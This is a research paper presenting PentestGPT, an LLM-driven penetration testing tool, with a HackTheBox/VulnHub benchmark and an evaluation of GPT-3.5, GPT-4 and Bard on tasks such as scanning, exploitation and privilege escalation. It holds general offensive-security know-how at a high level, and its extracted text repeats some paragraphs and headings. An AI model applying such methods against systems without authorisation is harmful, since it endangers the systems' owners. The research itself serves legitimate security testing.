# PentestGPT: An LLM-empowered Automatic Penetration Testing Tool

Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass

arXiv:2308.06782 [cs.SE, cs.CR], 13 Aug 2023. PDF: http://arxiv.org/pdf/2308.06782

# Abstract

Penetration testing, a crucial industrial practice for ensuring system security, has traditionally resisted automation due to the extensive expertise required of human professionals. Large Language Models (LLMs) have shown significant advancements in various domains, and their emergent abilities suggest their potential to revolutionize industries. In this research, we evaluate the performance of LLMs on real-world penetration testing tasks using a robust benchmark created from test machines hosted on practice platforms. Our findings reveal that while LLMs demonstrate proficiency in specific sub-tasks within the penetration testing process, such as using testing tools, interpreting outputs, and proposing subsequent actions, they also encounter difficulties in maintaining an integrated understanding of the overall testing scenario.

In response to these insights, we introduce PentestGPT, an LLM-empowered automatic penetration testing tool that leverages the abundant domain knowledge inherent in LLMs. PentestGPT is meticulously designed with three self-interacting modules, each addressing an individual sub-task of penetration testing, to mitigate the challenges related to context loss. Our evaluation shows that PentestGPT not only outperforms LLMs, with a task-completion increase of 228.6% over the GPT-3.5 model among the benchmark targets, but also proves effective in tackling real-world penetration testing challenges. Having been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and fostered active community engagement, attesting to its value and impact in both the academic and industrial spheres.
1) EXPLOITFLOW: a modular library to produce cyber security exploitation routes (exploit flows). EXPLOITFLOW aims to combine and compose exploits from different sources and frameworks, capturing the state of the system being tested in a flow after every discrete action, which allows learning attack trees that affect a given system (see the sketch after this list). EXPLOITFLOW's main motivation is to facilitate and empower Game Theory and Artificial Intelligence (AI) research in cyber security. It provides a unique representation of the exploitation process that encodes every facet within it. Its representation can be effectively integrated with various penetration testing tools and scripts, such as Metasploit [15], to perform end-to-end penetration testing. Such a representation can be further visualized to guide human experts in reproducing the testing process.
2) PENTESTGPT (this paper): an automated penetration testing system that leverages the power of LLMs to produce testing guidance and intuition at every given discrete state. It functions as the core component of the MALISM framework, guiding the LLMs to efficiently utilize their domain knowledge in real-world testing scenarios.
3) PENTESTPERF: a comprehensive penetration testing benchmark developed to evaluate the performance of penetration testers and automated tools across a wide array of testing targets. It offers a fair and robust platform for performance comparison.
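To make the exploit-flow idea concrete, the following is a minimal sketch, not EXPLOITFLOW's actual API: the class names (`SystemState`, `Action`, `ExploitFlow`) and their fields are illustrative assumptions. It demonstrates the point stated above: recording one state node per discrete action turns the accumulated flow into a tree of attack paths.

```python
from dataclasses import dataclass, field

@dataclass(frozen=True)
class SystemState:
    """Snapshot of the target after an action (illustrative fields)."""
    open_ports: frozenset
    credentials: frozenset
    shell_access: bool = False

@dataclass
class Action:
    name: str    # e.g. "nmap -sV 10.0.0.5"
    source: str  # framework the exploit comes from, e.g. "metasploit"

@dataclass
class FlowNode:
    state: SystemState
    children: dict = field(default_factory=dict)  # action name -> FlowNode

class ExploitFlow:
    """Records one state node per discrete action, yielding an attack tree."""
    def __init__(self, initial: SystemState):
        self.root = FlowNode(initial)
        self.cursor = self.root

    def step(self, action: Action, new_state: SystemState) -> None:
        node = FlowNode(new_state)
        self.cursor.children[action.name] = node
        self.cursor = node

# Example: two discrete actions extend the flow by two state nodes.
flow = ExploitFlow(SystemState(frozenset(), frozenset()))
flow.step(Action("nmap -sV 10.0.0.5", "nmap"),
          SystemState(frozenset({22, 80}), frozenset()))
flow.step(Action("exploit/unix/ftp/vsftpd_234_backdoor", "metasploit"),
          SystemState(frozenset({22, 80}), frozenset(), shell_access=True))
```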
The harmonious integration of these three components forms MALISM, an automated, self-evolving penetration testing framework capable of executing penetration tests over various targets. This framework for developing fully automated penetration testing tools, which we name cybersecurity cognitive engines, aims to revolutionize the field of penetration testing by significantly reducing the need for domain expertise and enabling more comprehensive and reliable testing.
Building on our insights into LLMs' capabilities in penetration testing, we present PENTESTGPT, an interactive system designed to enhance the application of LLMs in this domain. Drawing inspiration from the collaborative dynamics commonly observed in real-world human penetration testing teams, PENTESTGPT is particularly tailored to manage large and intricate projects. It features a tripartite architecture comprising Reasoning, Generation, and Parsing Modules, each reflecting a specific role within penetration testing teams. The Reasoning Module emulates the function of a lead tester, focusing on maintaining a high-level overview of the penetration testing status. We introduce a novel representation, the Pentesting Task Tree (PTT), based on the cybersecurity attack tree [16]. This structure encodes the testing process's ongoing status and steers subsequent actions. Uniquely, this representation can be translated into natural language and interpreted by the LLM, thereby being comprehended by the Generation Module and directing the testing procedure. The Generation Module, mirroring a junior tester's role, is responsible for constructing detailed procedures for specific sub-tasks.
Translating these into exact testing operations augments the generation process's accuracy. Meanwhile, the Parsing Module deals with the diverse text data encountered during penetration testing, such as tool outputs, source code, and HTTP web pages. It condenses and emphasizes these texts, extracting the essential information. Collectively, these modules function as an integrated system. PENTESTGPT completes a complex penetration testing task by bridging high-level strategies with precise execution and intelligent data interpretation, thereby maintaining a coherent and effective testing process.
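The Pentesting Task Tree can be pictured with a short sketch. This is a hypothetical reduction for illustration, not PENTESTGPT's actual data structure: each node carries a task and a status, and rendering the tree as indented text gives the natural-language form that, as described above, the LLM can read back.

```python
from dataclasses import dataclass, field
from typing import List

@dataclass
class PTTNode:
    """One task in the Pentesting Task Tree (illustrative)."""
    task: str                 # e.g. "Enumerate open ports"
    status: str = "todo"      # "todo" | "in-progress" | "done" | "failed"
    children: List["PTTNode"] = field(default_factory=list)

    def add(self, task: str) -> "PTTNode":
        child = PTTNode(task)
        self.children.append(child)
        return child

    def to_natural_language(self, depth: int = 0) -> str:
        """Render the tree as indented text an LLM can interpret."""
        lines = [f"{'  ' * depth}- {self.task} [{self.status}]"]
        for child in self.children:
            lines.append(child.to_natural_language(depth + 1))
        return "\n".join(lines)

root = PTTNode("Penetration-test 10.0.0.5", status="in-progress")
recon = root.add("Reconnaissance")
recon.add("Port scan with nmap").status = "done"
root.add("Exploit vulnerable FTP service")
print(root.to_natural_language())
```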
We evaluate PENTESTGPT using our benchmark to showcase its efficacy. Specifically, our system achieves remarkable performance gains, with 228.6% and 58.6% increases in sub-task completion compared to the direct usage of GPT-3.5 and GPT-4, respectively. We also apply PENTESTGPT to the HackTheBox active penetration testing machines challenge [17], completing 4 out of the 10 selected targets at a total OpenAI API cost of 131.5 US dollars, ranking among the top 1% of players in a community of over 670,000 members. This evaluation underscores PENTESTGPT's practical value in enhancing the efficiency and precision of penetration testing tasks. The solution has been made publicly available on GitHub¹, receiving widespread acclaim with over 4,700 stars at the time of writing, active community engagement, and ongoing collaboration with multiple industrial partners.
In summary, we make the following contributions:
• Development of a Comprehensive Penetration Testing Benchmark. We craft a robust and representative penetration testing benchmark, encompassing a multitude of test machines from leading platforms such as HackTheBox and VulnHub. This benchmark includes 182 sub-tasks covering OWASP's top 10 vulnerabilities, offering a fair and comprehensive evaluation of penetration testing.
• Empirical Evaluation of LLMs for Penetration Testing Tasks. By employing models like GPT-3.5, GPT-4, and Bard, our exploratory study rigorously investigates the strengths and limitations of LLMs in penetration testing. The insights gleaned from this analysis shed valuable light on the capabilities and challenges faced by LLMs, enriching our understanding of their applicability in this specialized domain.
• Development of an Innovative LLM-powered Penetration Testing System. We engineer PENTESTGPT, a novel interactive system that leverages the strengths of LLMs to carry out penetration testing tasks automatically. Drawing inspiration from real-world human penetration testing teams, PENTESTGPT integrates a tripartite design that mirrors the collaborative dynamics between senior and junior testers. This architecture optimizes LLMs' usage, significantly enhancing the efficiency and effectiveness of automated penetration testing.

1. For anonymity during the review process, we have created an anonymous repository to open-source our solution [18].
2308.06782 | 15 | # 2. Background & Related Work
# 2.1. Penetration Testing
Penetration testing, or "pentesting", is a critical practice for enhancing the security of organizational systems. In a typical penetration test, security professionals, known as penetration testers, analyze the target system, often leveraging automated tools. The standard process is divided into phases [19]: Reconnaissance, Scanning, Vulnerability Assessment, Exploitation, and Post-Exploitation (including reporting). These phases enable testers to understand the target system, identify vulnerabilities, and exploit them to gain access.
Despite substantial efforts [8], [20], [21] in the field, a fully automated penetration testing pipeline remains elusive. The challenges in automating the process arise from the comprehensive knowledge needed to understand and manipulate various vulnerabilities, and from the demand for a strategic plan to guide subsequent actions. In practice, penetration testers often use a combined approach integrating depth-first and breadth-first search techniques [19]. They begin by obtaining an overarching understanding of the target environment (utilizing a breadth-first approach) before focusing on specific services and vulnerabilities (employing a depth-first approach). This strategy ensures a thorough system analysis while prioritizing promising attack vectors, relying heavily on individual experience and domain expertise. Additionally, penetration testing requires many specialized tools with unique features and functions. This diversity adds complexity to the automation process. Therefore, even with the support of artificial intelligence, creating a fully unified solution for automated penetration testing remains a formidable challenge.
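The breadth-first-then-depth-first strategy can be sketched as a tiny scheduler. Everything here is an illustrative assumption (the scoring function, the service and lead names): a shallow enumeration pass scores every exposed service first, and only then is the most promising lead chased in depth.

```python
def explore(services, enumerate_service, follow_ups):
    """Breadth-first triage of services, then depth-first pursuit (sketch)."""
    # Breadth-first pass: take a shallow look at every service first.
    scored = sorted(((enumerate_service(s), s) for s in services), reverse=True)
    visited = set()
    # Depth-first pass: chase the most promising lead before its siblings.
    stack = [name for _, name in scored]   # best lead ends up on top...
    stack.reverse()                        # ...after reversing the order
    while stack:
        lead = stack.pop()
        if lead in visited:
            continue
        visited.add(lead)
        stack.extend(follow_ups(lead))     # deeper leads are popped next
    return visited

# Toy run: HTTP looks most promising, so its chain is pursued to the end.
found = explore(
    ["ssh", "http", "ftp"],
    enumerate_service=lambda s: {"ssh": 0.2, "http": 0.9, "ftp": 0.5}[s],
    follow_ups=lambda lead: {"http": ["sql-injection"],
                             "sql-injection": ["db-credentials"]}.get(lead, []),
)
print(sorted(found))
```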
# 2.2. Large Language Models
Large Language Models (LLMs), including OpenAI's GPT-3.5 and GPT-4, are prominent tools with applications extending to various cybersecurity-related fields, such as code analysis [22] and vulnerability repair [23]. These models are equipped with wide-ranging general knowledge and the capacity for elementary reasoning. They can comprehend, infer, and produce text resembling human communication, aided by a training corpus encompassing diverse domains like computer science and cybersecurity. Their ability to interpret context and recognize patterns enables them to adapt knowledge to new scenarios. This adaptability, coupled with their proficiency in interacting with systems in a human-like way, positions them as valuable assets for enhancing penetration testing processes. Despite inherent limitations, LLMs offer distinct attributes that can substantially aid in the automation and improvement of penetration testing tasks. Realizing this potential, however, requires the creation and application of a specialized and rigorous benchmark.
# 3. Penetration Testing Benchmark
# 3.1. Motivation
A fair evaluation of Large Language Models (LLMs) in penetration testing necessitates a robust and representative benchmark. Existing benchmarks in this domain [7], [8] have several limitations. First, they are often restricted in scope, focusing on a narrow range of potential vulnerabilities, and thus fail to capture the complexity and diversity of real-world cyber threats. For instance, the OWASP benchmark Juice Shop [24] is commonly adopted for evaluating web vulnerability testing. However, it does not touch on privilege escalation, which is an essential aspect of penetration testing. Second, existing benchmarks may not recognize the cumulative value of progress through the different stages of penetration testing, as they tend to evaluate only the final exploitation success. This approach overlooks the nuanced value each step contributes to the overall process, resulting in metrics that might not accurately represent actual performance in real-world scenarios.
To address these concerns, we propose the construction of a comprehensive penetration testing benchmark that meets the following criteria:
Task Variety. The benchmark must encompass diverse tasks, reflecting various operating systems and emulating the diversity of scenarios encountered in real-world penetration testing.
Challenge Levels. To ensure broad applicability, the benchmark must include tasks of varying difficulty levels, suitable for challenging both novice and expert testers.
Progress Tracking. Beyond mere success or failure metrics, the benchmark must facilitate tracking of incremental progress, thereby recognizing and scoring the value added at each stage of the penetration testing process (sketched below).
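As an illustration of the Progress Tracking criterion, here is a minimal sketch assuming each walkthrough sub-task earns equal credit, a hypothetical weighting: a partial run then scores partial credit instead of zero.

```python
def progress_score(completed: set, walkthrough: list) -> float:
    """Fraction of walkthrough sub-tasks completed (hypothetical metric)."""
    done = sum(1 for step in walkthrough if step in completed)
    return done / len(walkthrough)

walkthrough = ["port scan", "identify CMS", "SQL injection",
               "get user shell", "privilege escalation"]
# A run that stalls before privilege escalation still earns partial credit.
print(progress_score({"port scan", "identify CMS", "SQL injection"},
                     walkthrough))  # 0.6
```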
# 3.2. Benchmark Design
Following the criteria outlined previously, we develop a comprehensive benchmark that closely reflects real-world penetration testing tasks. The design process progresses through several stages.
Task Selection. Our first step is to meticulously select tasks from HackTheBox [9] (HTB) and VulnHub [10]. These platforms are widely recognized and frequently utilized for penetration testing practice. Our selection process is guided by a desire to incorporate a diverse and challenging set of tasks. Capture The Flag (CTF) exercises and real-world testing scenarios have been included. The targets are drawn from various operating systems and encompass a broad spectrum of vulnerabilities. This approach ensures a wide representation of real-world penetration testing tasks. To account for different skill levels, the selected tasks cover a broad range of difficulty. While HTB and VulnHub offer reference difficulty levels, we further validate these with input from three certified penetration testers², including the authors of this work.
This collaborative process yields a consensus on the final difficulty rating for each target, aligning with the conventional categorization [10] of penetration testing machines into easy, medium, and hard levels. It is worth noting that our benchmark does not explicitly include benign targets for evaluating false positives. This is because the iterative and exploratory nature of penetration testing inherently involves investigating services within the target that may ultimately be deemed benign. In this process, our primary focus is successfully identifying genuine vulnerabilities.
Task Decomposition. We further parse the testing process of each target into a series of sub-tasks, following the standard solution commonly referred to as the "walkthrough" in penetration testing. Each sub-task corresponds to a unique step in the overall process. Specifically, a sub-task may represent a micro-step involving the use of a particular penetration testing tool (e.g., performing port scanning with nmap [25]) or exploiting a unique vulnerability identified in the Common Weakness Enumeration (CWE) [26] (e.g., exploiting SQL injection).
To standardize the decomposition, we arrange the sub-tasks into a two-layer structure (see the sketch below). Initially, we categorize each sub-task according to the five phases of penetration testing, as described in Section 2. Then, we label the sub-task with either the corresponding CWE item it targets or the specific tool employed. These two steps enable us to formulate an exhaustive list of sub-tasks for every benchmark target. We include this list in Appendix 6, and the complete sub-task information is accessible on our anonymous open-source project [18].
Benchmark Validation. The final stage of our benchmark development involves rigorous validation. This step ensures that our benchmark accurately reflects real-world penetration testing scenarios and offers reproducibility. During validation, three certified penetration testers independently attempt the penetration testing targets, refining the sub-tasks as needed. We adjust our task decomposition accordingly because some targets may have multiple valid solutions.
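The sketch referenced above: a hypothetical encoding of the two-layer structure, with the phase taxonomy from Section 2.1 as layer one and a CWE-or-tool label as layer two. The field and class names are illustrative, not the benchmark's actual schema.

```python
from dataclasses import dataclass
from enum import Enum

class Phase(Enum):               # layer 1: the testing phases from Section 2
    RECONNAISSANCE = 1
    SCANNING = 2
    VULNERABILITY_ASSESSMENT = 3
    EXPLOITATION = 4
    POST_EXPLOITATION = 5

@dataclass
class SubTask:
    phase: Phase                 # layer 1 label
    label: str                   # layer 2: CWE item or tool used
    description: str

# Two sub-tasks of a hypothetical benchmark target.
benchmark_target = [
    SubTask(Phase.SCANNING, "nmap", "Port scan the target host"),
    SubTask(Phase.EXPLOITATION, "CWE-89", "Exploit SQL injection in login form"),
]
```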
2. Our penetration testers are all Offensive Security Certified Professionals (OSCP).
In the end, we compile a benchmark of 13 penetration testing targets with 182 sub-tasks in 25 categories. The benchmark covers all types of vulnerabilities listed in the OWASP [11] Top 10 Project. Detailed information on the included categories is listed in Appendix Section 6. To contribute to community development, we have made this benchmark publicly available online at our anonymous project website [18].
# 4. Exploratory Study
We conduct an exploratory study to assess the capabilities of LLMs in penetration testing. Our primary objective is to determine how well LLMs can adapt to the real-world complexities and challenges associated with penetration testing tasks. Specifically, we aim to address the following two research questions:
RQ1 (Capability): To what extent can LLMs perform penetration testing tasks?
RQ2 (Comparative Analysis): How do the problem-solving strategies of human penetration testers and LLMs differ?
We utilize the benchmark described in Section 3 to evaluate the performance of LLMs on penetration testing tasks. In the following, we first delineate our testing strategy for this study. Subsequently, we present the testing results and an analytical discussion to address the above research questions.
2308.06782 | 24 | # 4.1. Testing Strategy
LLMs cannot perform penetration tests directly. Their capabilities are primarily text-based, responding to queries and providing suggestions. However, penetration testing often involves operations with user interfaces (UIs) and understanding graphical information, such as website images. This necessitates a bridge between the test machine and the LLM to facilitate task completion.
We introduce an interactive loop structure to evaluate the LLM's abilities in penetration testing within our benchmark. This process, depicted in Figure 2, consists of the following stages: (1) We present the target information to the LLM and request recommendations for penetration testing actions. This initiates a looped testing procedure. (2) We implement the actions suggested by the LLM, which encompass both terminal commands and graphical interactions. (3) We gather the results of the actions. Text-based output, such as terminal responses or source code, is recorded directly. Human penetration testers provide concise summaries and descriptions for non-textual results (e.g., images). The summarized information is returned to the LLM to inform subsequent actions. (4) This cycle continues until we identify a solution or reach a standstill. We compile a record of the testing procedures, encompassing successful tasks, ineffective actions, and any reasons for failure, if applicable.
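In code form, the loop looks roughly as follows. The callables `llm`, `execute`, and `summarize` are placeholders for the chatbot query, the human-executed action, and the condensation of its output; the stop condition and round cap are likewise illustrative assumptions, not the paper's exact protocol.

```python
def interactive_test_loop(llm, execute, summarize, target_info, max_rounds=50):
    """Looped LLM-driven testing: suggest -> execute -> summarize -> repeat."""
    record = []
    context = f"Target: {target_info}. Recommend the next testing action."
    for _ in range(max_rounds):
        suggestion = llm(context)                 # (1) ask LLM for next action
        if suggestion.strip().upper() == "DONE":  # solved or at a standstill
            break
        raw_result = execute(suggestion)          # (2) human runs the action
        digest = summarize(raw_result)            # (3) condense output (text is
                                                  #     kept; images described)
        record.append((suggestion, digest))       # keep the testing record
        context = (f"Previous action: {suggestion}\n"
                   f"Result: {digest}\nNext action?")
    return record                                 # (4) compiled procedure log
```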
2308.06782 | 25 | TABLE 1: Overall performance of LLMs on Penetration Testing Benchmark.
| Tool | Easy: Overall (7) | Easy: Sub-task (77) | Medium: Overall (4) | Medium: Sub-task (71) | Hard: Overall (2) | Hard: Sub-task (34) | Average: Overall (13) | Average: Sub-task (182) |
|---|---|---|---|---|---|---|---|---|
| GPT-3.5 | 1 (14.29%) | 24 (31.17%) | 0 (0.00%) | 13 (18.31%) | 0 (0.00%) | 5 (14.71%) | 1 (7.69%) | 42 (23.07%) |
| GPT-4 | 4 (57.14%) | 52 (67.53%) | 1 (25.00%) | 27 (38.03%) | 0 (0.00%) | 8 (23.53%) | 5 (38.46%) | 87 (47.80%) |
| Bard | 2 (28.57%) | 29 (37.66%) | 0 (0.00%) | 16 (22.54%) | 0 (0.00%) | 5 (14.71%) | 2 (15.38%) | 50 (27.47%) |
| Average | 2.3 (33.33%) | 35 (45.45%) | 0.33 (8.33%) | 18.7 (26.29%) | 0 (0.00%) | 6 (17.64%) | 2.7 (20.5%) | 59.7 (32.78%) |
Figure 2: Overview of strategy to use LLMs for penetration testing.
# 4.2. Evaluation Settings

…scanners such as Nexus [30] and OpenVAS [31]. Consequently, we explicitly instruct the LLMs to refrain from using these tools. However, we follow the LLMs' recommendations for utilizing other tools designed to validate specific vulnerability types (e.g., sqlmap [32] for SQL injection). Occasionally, versioning discrepancies may lead the LLMs to provide incorrect instructions for tool usage. In such instances, our penetration testing experts evaluate whether the instructions would have been valid for a previous version of the tool. They then make any necessary adjustments to ensure the tool's correct operation.

# 4.3. Capability Evaluation (RQ1)
We proceed to assess the performances of various LLMs in penetration testing tasks using the strategy described above.

Model Selection. Our study focuses on three cutting-edge LLMs that are currently accessible: GPT-3.5 and GPT-4 from OpenAI, and LaMDA [27] from Google. These models are selected based on their prominence in the research community and their consistent availability. To interact with them, we utilize the chatbot services provided by OpenAI and Google, namely ChatGPT [28] and Bard [14]. For this paper, the terms GPT-3.5, GPT-4, and Bard denote these three LLMs.

Experimental Setup. We conduct our experiments in a local environment where the target and testing machines are part of the same private network. The testing machine runs Kali Linux [29], version 2023.1. Several measures are implemented to validate the effectiveness of our testing procedures. First, we repeat the tests to account for the inherent variability in LLM outputs: we test each target with each LLM five times.
We thus performed 195 tests in total, i.e., 5 repetitions * 3 models * 13 targets. In this process, a sub-task is considered successful if it succeeds in at least one trial, and a penetration task is considered successful as long as one trial succeeds. Second, we make our best effort to translate UI operations and graphical information into natural language accurately. In addition, we ensure the precise execution of the instructions provided by the LLMs. Third, we maintain the integrity of the testing process by strictly limiting the tester's role to executing actions and reporting results, without adding expert knowledge or guidance. Finally, the testing and target machines are rebooted after each test to reset their states, ensuring a consistent starting point for each test.

Tool Usage. Our study aims to assess the innate capabilities of LLMs without reliance on automated vulnerability scanners such as Nexus [30] and OpenVAS [31]. Consequently, we explicitly instruct the LLMs to refrain from using these tools. However, we follow the LLMs' recommendations for utilizing other tools designed to validate specific vulnerability types (e.g., sqlmap [32] for SQL injections). Occasionally, versioning discrepancies may lead the LLMs to provide incorrect instructions for tool usage. In such instances, our penetration testing experts evaluate whether the instructions would have been valid for a previous version of the tool and then make any necessary adjustments to ensure the tool's correct operation.
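The success criteria above amount to a simple aggregation over repeated trials. The sketch below illustrates that bookkeeping in Python; the target names, sub-task list, and run_trial stub are our illustrative assumptions, since each real trial is driven manually by a human tester.

```python
import random
from itertools import product

MODELS = ["GPT-3.5", "GPT-4", "Bard"]
TARGETS = [f"target-{i:02d}" for i in range(1, 14)]  # 13 benchmark targets (names hypothetical)
SUBTASKS = ["port-scanning", "web-enumeration", "flag-capture"]  # illustrative subset
REPETITIONS = 5  # 5 x 3 x 13 = 195 tests in total

def run_trial(model: str, target: str) -> dict:
    """Stand-in for one manually driven trial, mapping sub-task name -> success.
    In the study, a human tester relays the LLM's instructions and records outcomes."""
    return {s: random.random() < 0.3 for s in SUBTASKS}

for model, target in product(MODELS, TARGETS):
    trials = [run_trial(model, target) for _ in range(REPETITIONS)]
    # A sub-task counts as completed if it succeeds in at least one of the five trials.
    completed = {s for s in SUBTASKS if any(t[s] for t in trials)}
    # The end-to-end task counts as completed if any single trial captures the flag.
    task_done = any(t["flag-capture"] for t in trials)
    print(f"{model:8s} {target}: {len(completed)}/{len(SUBTASKS)} sub-tasks, done={task_done}")
```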
# 4.3. Capability Evaluation (RQ1)

To study RQ1, we begin by assessing the overall performance of three prominent LLMs: GPT-4, Bard, and GPT-3.5. The results of these evaluations are compiled in Table 1. They show that all three LLMs completed at least one end-to-end penetration testing task. This achievement underscores their ability to conduct a broad spectrum of testing operations, particularly in environments of lower complexity. Among the models, GPT-4 stands out with superior performance, succeeding on 4 targets of easy difficulty and 1 of medium difficulty. Bard and GPT-3.5 also demonstrate commendable capabilities, completing 2 and 1 easy targets, respectively. At the sub-task level, GPT-4 accomplishes 52 of 77 sub-tasks on easy targets and 27 of 71 on medium ones, underlining its potential to contribute to more complex penetration testing scenarios. Though not as proficient as GPT-4, GPT-3.5 and Bard still show promise, completing 13 (18.31%) and 16 (22.54%) of the sub-tasks on medium targets, respectively.
However, the performance of all three models diminishes noticeably on hard targets. While each model can complete the initial reconnaissance phase on these targets, all fall short in exploiting the identified vulnerability. This outcome is not entirely unexpected, as the hard machines are deliberately crafted to be exceedingly difficult. They often include services that appear vulnerable but are, in fact, non-exploitable, a trait commonly referred to as a rabbit hole [33]. Additionally, the routes to successfully exploiting these machines are typically inventive and unforeseeable, making them resistant to straightforward replication by automated tools. For instance, the benchmark target Falafel involves deliberately crafted SQL injection vulnerabilities that resist sqlmap and can only be exploited through manually designed payloads.
Existing LLMs do not exhibit the capability to solve such targets without the guidance of human experts.
Finding 1: Large Language Models (LLMs) have shown proficiency in conducting end-to-end penetration testing tasks but struggle to overcome challenges presented by more difficult targets.
TABLE 2: Top 10 types of sub-tasks completed by each tool.

Sub-Task                      | Walkthrough | GPT-3.5 | GPT-4 | Bard
General Tool Usage            | 25          | 4       | 10    | 7
Port Scanning                 | 9           | 9       | 9     | 9
Web Enumeration               | 18          | 4       | 8     | 4
Code Analysis                 | 18          | 4       | 5     | 4
Shell Construction            | 11          | 3       | 7     | 4
Directory Exploitation        | 11          | 1       | 7     | 1
General Privilege Escalation  | 8           | 2       | 4     | 3
Flag Capture                  | 8           | 1       | 5     | 2
Password/Hash Cracking        | 8           | 2       | 4     | 2
Network Exploitation          | 7           | 1       | 3     | 2
We further examine the detailed sub-task completion performances of the three LLMs, as presented in Table 2. Analyzing the completion status, we identify several areas where LLMs excel. First, they adeptly utilize common penetration testing tools and correctly interpret their outputs, especially in enumeration tasks. For example, all three evaluated LLMs successfully perform all nine Port Scanning sub-tasks: they can configure the widely used port scanner nmap [25], comprehend the scan results, and formulate subsequent actions. Second, the LLMs reveal a deep understanding of prevalent vulnerability types, connecting them to the services on the target system; this understanding is evidenced by the successful completion of sub-tasks related to various vulnerability types. Finally, LLMs demonstrate their effectiveness in code analysis and generation, particularly in the Code Analysis and Shell Construction sub-tasks. These tasks require the models to read and generate code in different programming languages, which is essential in penetration testing and often culminates in identifying potential vulnerabilities in code snippets and crafting the corresponding exploits. Notably, GPT-4 outperforms the other two models in code interpretation and generation, marking it the most suitable candidate for penetration testing tasks.

Finding 2: LLMs can efficiently use penetration testing tools, identify common vulnerabilities, and interpret source code to identify vulnerabilities.

# 4.4. Comparative Analysis (RQ2)
To address RQ2, we examine the problem-solving strategies that LLMs employ, contrasting them with those of human penetration testers. In each penetration testing trial, we concentrate on two main aspects: (1) identifying the unnecessary operations that LLMs prompt, which are not conducive to successful penetration testing, as compared to a standard walkthrough; and (2) understanding the specific factors that prevent LLMs from successfully executing penetration tests.

TABLE 3: Top unnecessary operations prompted by LLMs on the benchmark targets.

Unnecessary Operation | GPT-3.5 | GPT-4 | Bard | Total
Brute-Force           | 75      | 92    | 68   | 235
CVE Study             | 29      | 24    | 28   | 81
SQL Injection         | 14      | 21    | 16   | 51
Command Injection     | 18      | 7     | 12   | 37

TABLE 4: Top causes for failed penetration testing trials.

Failure Reason                        | GPT-3.5 | GPT-4 | Bard | Total
Session context lost                  | 25      | 18    | 31   | 74
False command generation              | 23      | 12    | 20   | 55
Deadlock operations                   | 19      | 10    | 16   | 45
False scanning output interpretation  | 13      | 9     | 18   | 40
False source code interpretation      | 16      | 11    | 10   | 37
Cannot craft valid exploit            | 11      | 15    | 8    | 34
We analyze the unnecessary operations prompted by LLMs by breaking down the recorded testing procedures into sub-tasks, using the same method that formulates the benchmark sub-tasks, as outlined in Section 3. By comparing against a standard walkthrough, we identify the primary sub-task trials that fall outside the walkthrough and are thus irrelevant to the penetration testing process. The results are summarized in Table 3. We find that the most prevalent unnecessary operation prompted by LLMs is brute force: for every service requiring password authentication, the LLMs typically advise brute-forcing it, an ineffective strategy in penetration testing. We surmise that many reported enterprise hacking incidents involve password cracking and brute force; LLMs learn from such incident reports and consequently treat brute force as a viable solution. Besides brute force, LLMs suggest that testers engage in CVE studies, SQL injections, and command injections. These recommendations are common, as real-world penetration testers often prioritize these techniques, even though they do not always provide the exact solution.
We further investigate the reasons behind the failures of the penetration testing trials, manually categorizing the causes of failure for all 195 trials; the results are documented in Table 4. The table reveals that the predominant cause of failure is the loss of session context: all three examined models have difficulty maintaining long-term conversational memory, frequently forgetting previous test results as the dialogue progresses. This lack of retention may be attributable to the limited token size of the LLM conversation context. Given the intricate nature of penetration testing, where a tester must skillfully link minor vulnerabilities across different services to develop a coherent exploitation strategy, this loss of context substantially undermines the models' effectiveness.
Finding 3: LLMs struggle to maintain long-term memory, which is vital to link vulnerabilities and develop exploitation strategies effectively.
Secondly, LLMs strongly prefer the most recent tasks, adhering rigorously to a depth-first search approach. They concentrate on exploiting the immediate service and rarely deviate to a new target until all potential paths for the current one have been pursued. This can be attributed to the attention of LLMs focusing more on the beginning and end of the prompt, as revealed in [34]. Experienced penetration testers, by contrast, generally assess the system from a broader standpoint, strategizing the subsequent steps likely to yield the most substantial results. Combined with the aforementioned memory-loss issue, this tendency causes LLMs to become overly fixated on a specific service; as the test progresses, the models completely forget previous findings and reach a deadlock.
Finding 4: LLMs strongly prefer recent tasks and a depth-first search approach, often resulting in an over-focus on one service and forgetting previous findings.
Lastly, LLMs suffer from inaccurate result generation and hallucination issues, as noted in [35]. This phenomenon ranks as the second most frequent cause of failure and is characterized by the generation of false commands. In our study, we observe that LLMs frequently identify the appropriate tool for the task but stumble in configuring it with the correct settings. In some cases, they even concoct non-existent testing tools or tool modules.
Finding 5: LLMs may generate inaccurate operations or commands, often stemming from inherent inaccuracies and hallucinations.
Our exploratory study of the three LLMs within penetration testing reveals their potential for executing end-to-end tasks. Nevertheless, challenges arise in maintaining long-term memory, devising a testing strategy beyond a depth-first approach, and generating accurate operations. In the following section, we elucidate how we address these challenges and outline our strategy for designing our LLM-powered penetration testing tool.
# 5. Methodology
# 5.1. Overview
In light of the challenges identified in the preceding section, we present our proposed solution, PENTESTGPT, which leverages the synergistic interplay of three LLM-powered modules. As illustrated in Figure 3, PENTESTGPT incorporates three core modules: the Reasoning Module, the Generation Module, and the Parsing Module. Each module reserves one LLM session with its own conversation and context. The user interacts seamlessly with PENTESTGPT, where distinct modules process different types of messages. This interaction culminates in a final decision, suggesting the subsequent step of the penetration testing process that the user should undertake. In the following sections, we elucidate our design rationale and provide a detailed breakdown of the engineering processes behind PENTESTGPT.
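To make the module split concrete, the sketch below shows one way the three sessions could be composed. The class and method names, and the stub call_llm backend, are our illustrative assumptions rather than PENTESTGPT's actual interfaces.

```python
def call_llm(history: list) -> str:
    """Stub backend; swap in a real chat-completion API call here."""
    return f"(model reply to: {history[-1][1][:40]}...)"

class LLMSession:
    """One chat session holding its own conversation history (context)."""
    def __init__(self, system_prompt: str):
        self.history = [("system", system_prompt)]

    def send(self, message: str) -> str:
        self.history.append(("user", message))
        reply = call_llm(self.history)
        self.history.append(("assistant", reply))
        return reply

class PentestGPT:
    """Three cooperating modules, each reserving a separate LLM session."""
    def __init__(self):
        self.reasoning = LLMSession("Maintain the pentesting task tree and pick the next task.")
        self.generation = LLMSession("Expand one chosen task into concrete testing operations.")
        self.parsing = LLMSession("Condense raw tool output into its key information.")

    def step(self, raw_user_input: str) -> str:
        condensed = self.parsing.send(raw_user_input)   # e.g. a long nmap dump
        next_task = self.reasoning.send(condensed)      # update the tree, choose a task
        return self.generation.send(next_task)          # concrete operation for the user

print(PentestGPT().step("nmap output: 21/tcp open ftp vsftpd 2.3.4 ..."))
```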
# 5.2. Design Rationale
